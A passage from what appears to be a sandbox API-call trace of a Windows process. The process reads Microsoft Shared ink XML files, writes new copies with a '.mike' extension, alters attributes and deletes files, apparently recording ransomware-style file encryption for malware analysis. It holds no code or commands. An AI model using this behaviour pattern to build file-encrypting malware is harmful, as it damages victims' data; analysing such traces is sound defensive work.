lpBuffer=0x21beb34*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.860] CloseHandle (hObject=0x264) returned 1 [0045.860] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.860] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", lpFilePart=0x0) returned 0x57 [0045.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.860] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5898920, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5898920, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5898920, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x510)) returned 1 [0045.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.861] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.861] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", lpFilePart=0x0) returned 0x57 [0045.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.861] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21c0354 | out: lpFileInformation=0x21c0354*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5898920, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5898920, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5898920, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x510)) returned 1 [0045.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.861] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", dwFileAttributes=0x80) returned 0 [0045.862] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.862] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", lpFilePart=0x0) returned 0x57 [0045.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.862] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5898920, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5898920, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5898920, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x510)) returned 1 [0045.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.862] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.862] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", lpFilePart=0x0) returned 0x57 [0045.862] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike")) returned 1 [0045.863] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.863] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.863] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.865] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.865] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.865] GetFileType (hFile=0x264) returned 0x1 [0045.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.865] GetFileType (hFile=0x264) returned 0x1 [0045.865] CloseHandle (hObject=0x264) returned 1 [0045.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.867] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.868] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.868] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.868] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), fInfoLevelId=0x0, lpFileInformation=0x21c25b4 | out: lpFileInformation=0x21c25b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x324)) returned 1 [0045.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.868] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), fInfoLevelId=0x0, lpFileInformation=0x21c2900 | out: lpFileInformation=0x21c2900*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x324)) returned 1 [0045.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", lpFilePart=0x0) returned 0x57 [0045.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.868] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", lpFilePart=0x0) returned 0x57 [0045.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.869] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", lpFilePart=0x0) returned 0x57 [0045.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.869] GetFileType (hFile=0x264) returned 0x1 [0045.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.869] GetFileType (hFile=0x264) returned 0x1 [0045.869] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.870] WriteFile (in: hFile=0x264, lpBuffer=0x21c38b4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21c38b4*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.870] CloseHandle (hObject=0x264) returned 1 [0045.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.871] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), fInfoLevelId=0x0, lpFileInformation=0x21c3374 | out: lpFileInformation=0x21c3374*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x324)) returned 1 [0045.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.871] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.871] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.871] GetFileType (hFile=0x264) returned 0x1 [0045.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.871] GetFileType (hFile=0x264) returned 0x1 [0045.871] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.871] ReadFile (in: hFile=0x264, lpBuffer=0x21c49f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21c49f8*, lpNumberOfBytesRead=0x2af038*=0x324, lpOverlapped=0x0) returned 1 [0045.872] CloseHandle (hObject=0x264) returned 1 [0045.873] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", lpFilePart=0x0) returned 0x57 [0045.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.873] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.873] GetFileType (hFile=0x264) returned 0x1 [0045.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.873] GetFileType (hFile=0x264) returned 0x1 [0045.873] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.873] WriteFile (in: hFile=0x264, lpBuffer=0x21c8bbc*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21c8bbc*, lpNumberOfBytesWritten=0x2af02c*=0x330, lpOverlapped=0x0) returned 1 [0045.873] CloseHandle (hObject=0x264) returned 1 [0045.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", lpFilePart=0x0) returned 0x57 [0045.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.874] GetFileType (hFile=0x264) returned 0x1 [0045.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.874] GetFileType (hFile=0x264) returned 0x1 [0045.875] WriteFile (in: hFile=0x264, lpBuffer=0x21cbdfc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21cbdfc*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.875] CloseHandle (hObject=0x264) returned 1 [0045.876] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.876] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", lpFilePart=0x0) returned 0x57 [0045.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.876] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58bea80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58bea80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58bea80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x550)) returned 1 [0045.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.876] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.876] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", lpFilePart=0x0) returned 0x57 [0045.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.877] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21cd61c | out: lpFileInformation=0x21cd61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58bea80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58bea80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58bea80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x550)) returned 1 [0045.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.877] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", dwFileAttributes=0x80) returned 0 [0045.878] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpFilePart=0x0) returned 0x52 [0045.878] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft 